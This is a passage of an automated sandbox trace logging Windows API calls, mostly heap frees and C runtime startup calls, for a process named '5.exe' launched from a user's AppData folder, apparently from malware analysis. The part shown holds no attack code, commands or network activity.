(in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c118 | out: hHeap=0x570000) returned 1 [0112.998] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c140 | out: hHeap=0x570000) returned 1 [0112.998] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c168 | out: hHeap=0x570000) returned 1 [0112.998] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c190 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c1b8 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c1e0 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c208 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c230 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c258 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c280 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c2a8 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c2d0 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c2f8 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c320 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c348 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c370 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c398 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c3c0 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c3e8 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c410 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c438 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1618 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1640 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1668 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1690 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a16b8 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a16e0 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1708 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1730 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1758 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1780 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a17a8 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a17d0 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a17f8 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1820 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1848 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1870 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1898 | out: hHeap=0x570000) returned 1 [0112.999] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a18c0 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a18e8 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1910 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1938 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1960 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1988 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a19b0 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a19d8 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1a00 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1a28 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1a50 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1a78 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1aa0 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1ac8 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1af0 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1b18 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1b40 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1b68 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1b90 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1bb8 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1be0 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1c08 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1c30 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1c58 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1c80 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1ca8 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1cd0 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1cf8 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1d20 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1d48 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1d70 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1d98 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1dc0 | out: hHeap=0x570000) returned 1 [0113.000] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1e18 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1e40 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1e68 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1e90 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1eb8 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1ee0 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1f08 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1f30 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1f58 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1f80 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1fa8 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1fd0 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1ff8 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2020 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2070 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2098 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a20c0 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a20e8 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585490 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2110 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2138 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2160 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2188 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a21b0 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a21d8 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2200 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2228 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2250 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2278 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a22a0 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a22c8 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a22f0 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2318 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2340 | out: hHeap=0x570000) returned 1 [0113.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2368 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2390 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a23b8 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a23e0 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2408 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2430 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2458 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2480 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a24a8 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a24d0 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a24f8 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2520 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2548 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2570 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2598 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a25c0 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2618 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2640 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2668 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2690 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a26b8 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a26e0 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2708 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2730 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2758 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2780 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a27a8 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a27d0 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a27f8 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2820 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2848 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2870 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2898 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a28c0 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a28e8 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2910 | out: hHeap=0x570000) returned 1 [0113.002] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2938 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2960 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2988 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a29b0 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a29d8 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2a00 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2a28 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2a50 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2a78 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2aa0 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a4e00 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59eaf8 | out: hHeap=0x570000) returned 1 [0113.003] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0113.003] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59a3e8 | out: hHeap=0x570000) returned 1 [0113.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59cdc8 | out: hHeap=0x570000) returned 1 [0113.003] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0113.004] GetLastError () returned 0x57 [0113.004] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f584 | out: phModule=0x18f584) returned 0 [0113.004] ExitProcess (uExitCode=0x0) [0113.004] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59ad00 | out: hHeap=0x570000) returned 1 [0113.004] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "9" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe" page_root = "0x45d0b000" os_pid = "0xa40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9c8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 101 os_tid = 0x644 [0112.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x1f24d820, dwHighDateTime=0x1d5fd35)) [0112.703] GetCurrentProcessId () returned 0xa40 [0112.703] GetCurrentThreadId () returned 0x644 [0112.703] GetTickCount () returned 0x114d4bd [0112.703] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23292663124) returned 1 [0112.703] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x4058b1)) [0112.703] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2f90000 [0112.704] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.704] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0112.704] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0112.704] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0112.704] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0112.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.705] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.705] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.706] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.706] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.706] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.706] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.706] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.706] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.706] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.706] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.706] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.706] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.707] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.707] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.707] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x214) returned 0x2f907d0 [0112.708] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.708] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.708] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.708] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.708] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.708] GetCurrentThreadId () returned 0x644 [0112.708] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0112.708] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x800) returned 0x2f909f0 [0112.708] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.708] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0112.708] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.708] SetHandleCount (uNumber=0x20) returned 0x20 [0112.708] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe\" " [0112.708] GetEnvironmentStringsW () returned 0x2b0380* [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x0, Size=0xaca) returned 0x2f911f8 [0112.709] FreeEnvironmentStringsW (penv=0x2b0380) returned 1 [0112.709] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x46e528, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe")) returned 0x56 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x0, Size=0xb6) returned 0x2f91cd0 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x98) returned 0x2f91d90 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x3e) returned 0x2f91e30 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x6c) returned 0x2f91e78 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x6e) returned 0x2f91ef0 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x78) returned 0x2f91f68 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x62) returned 0x2f91fe8 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x2e) returned 0x2f92058 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x48) returned 0x2f92090 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x28) returned 0x2f920e0 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x1a) returned 0x2f92110 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x4a) returned 0x2f92138 [0112.709] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x72) returned 0x2f92190 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x30) returned 0x2f92210 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x2e) returned 0x2f92248 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x1c) returned 0x2f92280 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0xd2) returned 0x2f922a8 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x7c) returned 0x2f92388 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x36) returned 0x2f92410 [0112.710] RtlAllocateHeap 